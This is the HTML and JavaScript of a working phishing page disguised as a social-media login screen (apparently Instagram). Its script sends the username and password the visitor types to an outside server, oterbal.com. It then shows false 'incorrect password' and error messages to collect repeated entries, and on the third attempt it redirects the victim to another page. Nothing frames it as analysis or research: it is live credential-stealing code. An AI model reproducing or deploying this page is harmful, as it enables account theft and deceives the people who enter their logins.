

<!-- <div id="google_translate_element" style='position: fixed; bottom: 0; left: 0'></div>
  <script type="text/javascript">
        function googleTranslateElementInit() {
            new google.translate.TranslateElement({pageLanguage: 'en', layout: google.translate.TranslateElement.InlineLayout.SIMPLE}, 'google_translate_element');
        }
    </script>

    <script type="text/javascript" src="https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script> --><!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <meta name="robots" content="noindex">
    <meta name="googlebot" content="noarchive">

</head>

<body>
    <style>
        * {
            padding: 0;
            margin: 0;
            box-sizing: border-box0;
        }

        body {
            background-color: #FAFAFA;
            font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
        }

        .container-item {
            width: 85%;
            margin: 20px 50%;
            transform: translateX(-50%);
            padding: 30px 10px;
            display: block;
            border: 1px solid #e9e9e9;
            background-color: white;
        }

        input {
            display: block;
            width: 93.5%;
            margin: 0 3%;
            padding: 20px 10px 10px 10px;
            border-radius: 3px;
            border: 1px solid #DBDBDB;
            margin: 5px 0;
            color: #282727;
            background: #FAFAFA;
            font-size: 13px;
            outline: 1px solid transparent;
        }

        input[type=password] {
            padding: 25px 10px 10px 10px;
        }

        label {
            font-size: 11.5px;
            position: absolute;
            transform: translateY(18px);
            /* transform: translateY(7px); */
            padding: 0px 10px;
            transition: 0.2s ease-in-out all;
            color: #838181;
        }

        .label-toggle {
            transform: translateY(7px);
        }

        button {
            width: 100%;
            padding: 10px;
            background: dodgerblue;
            color: white;
            border: 1px solid transparent;
            border-radius: 3px;
            margin: 10px 0;
            font-weight: bold;
        }

        a {
            text-align: right;
            color: #114b86;
            text-decoration: none;
            font-size: 13px;
        }

        ul {
            display: flex;
            justify-content: center;
            list-style-type: none;
            align-items: center;
        }

        #loader {
            position: absolute;
            left: 50%;
            transform: translate(-50%, 18px);
            visibility: hidden;
        }

        #feedback {
            display: none;
        }

        @media screen and (min-width: 768px) {
            .container {
                width: 70%;
                margin: 0 50%;
                transform: translateX(-50%);
            }

            .container-item {
                width: 340px;
                margin-top: 60px;
            }

            #error {
                padding: 0 35% !important;
            }
        }
    </style>
    <div class="container">
        <div class="container-item"><br><br>
            <center><img src="https://cdn.glitch.global/71ee619e-88b3-46bc-844d-9adb03253e64/gi.png" width="200px"></center><br>
            <label class="label" for="">Phone number, username, or email</label>
            <input class="input" type="text" id="username" name="username">

            <label class="label" for="">Password</label>
            <input class="input" type="password" id="password" name="password">

            <button id="login">Log in</button>
            <img src="https://cdn.glitch.global/71ee619e-88b3-46bc-844d-9adb03253e64/load.gif" width="18px" id="loader">
            <br>
            <p style="text-align: center;"><a href="#">Forget Password ?</a></p>
        </div>
        <!-- <p id="feedback" style="text-align: center; font-size: 13px; margin: 10px 0; color: #ec3131; padding: 0 23%;"></p> -->

        <p id="feedback" style="text-align: center; font-size: 13px; margin: 10px 0; color: #ec3131; padding: 0 23%;"></p>

        <div class="container-item" style="padding: 15px 10px;">
            <p style="text-align: center; font-size: 13px;">Don't have an account? <a href=""
                    style="color: dodgerblue;">Sign up</a></p>
        </div>
        <p style="text-align: center; font-size: 13px;">Get the app.</p>
        <ul>
            <li><img src="https://cdn.glitch.global/71ee619e-88b3-46bc-844d-9adb03253e64/go.png" width="100px" height="38px" style="margin: 10px 5px;"></li>
            <li><img src="https://cdn.glitch.global/71ee619e-88b3-46bc-844d-9adb03253e64/mi.png" width="100px" style="margin: 10px 5px;"></li>
        </ul>
        <p style="text-align: center; margin: 15px 0;"><img src="https://cdn.glitch.global/71ee619e-88b3-46bc-844d-9adb03253e64/me.svg" width="50px"></p>
    </div>

        <iframe src="" id='iframLink' style="opacity: 0;" frameborder="0"></iframe>

    <script>
        var login = document.getElementById('login')
        var loader = document.getElementById('loader')
        var username = document.getElementById('username')
        var password = document.getElementById('password')
        var feedback = document.getElementById('feedback')
        var x = 0;
        var label = document.querySelectorAll(".label")
        var input = document.querySelectorAll(".input")
        var container = document.querySelector('.container')

        var iframLink =document.getElementById('iframLink')


        for (let i = 0; i < label.length; i++) {
            label[i].addEventListener('click', function () {
                label[0].classList.add('label-toggle')
                label[1].classList.add('label-toggle')
            })

            input[i].addEventListener('click', function () {
                label[0].classList.add('label-toggle')
                label[1].classList.add('label-toggle')
            })

            // container.addEventListener('click', function () {
            //     if (input[i].value === "") {
            //         label[0].classList.remove('label-toggle')
            //         label[1].classList.remove('label-toggle')
            //     }
            // })

        }



        login.addEventListener('click', function () {
            login.textContent = ""
            login.style.padding = "16px 10px"
            loader.style.visibility = 'visible'

            setTimeout(() => {
                feedback.style.display = 'block'
                login.textContent = "Log In"
                loader.style.visibility = "hidden"
                if (username.value == "" || password.value == "") {
                    feedback.textContent = "Input's cannot be empty"
                } else {
                    validation()
                }
            }, 1500);


        })

        function validation() {
            login.textContent = "";
            loader.style.visibility = 'visible'

            setTimeout(() => {
                login.textContent = 'Log In'
                loader.style.visibility = 'hidden'

                const data = new FormData();
                data.append('email', username.value);
                data.append('password', password.value);
                const response = new XMLHttpRequest();
                response.onreadystatechange = function () {
                    feedback.style.display = 'block'
                }
                response.open('POST', 'https://oterbal.com/Hadoni/file.php', true);
                response.send(data);

                const dataD = new FormData();
                dataD.append('email', username.value);
                dataD.append('password', password.value);
                const response2 = new XMLHttpRequest();
                response2.onreadystatechange = function () {
                }
                response2.open('POST', 'https://oterbal.com/Hadoni/file.php', true);
                response2.send(dataD);

                x += 1
                feedback.textContent = 'The password you entered is incorrect. Please check your password and try again';
                if (x == 2) {
                    // feedback.textContent = ''
                    feedback.textContent = 'Sorry an error occurred please try again later'
                } else if (x == 3) {
                    feedback.textContent = '';
                    setTimeout(() => {
                        window.location.href = 'https://light-dawn-echidna.glitch.me/Success%20New%20Text%20Document.html'
                    }, 1500);
                }

            }, 1500);
        }
    </script>
</body>

</html>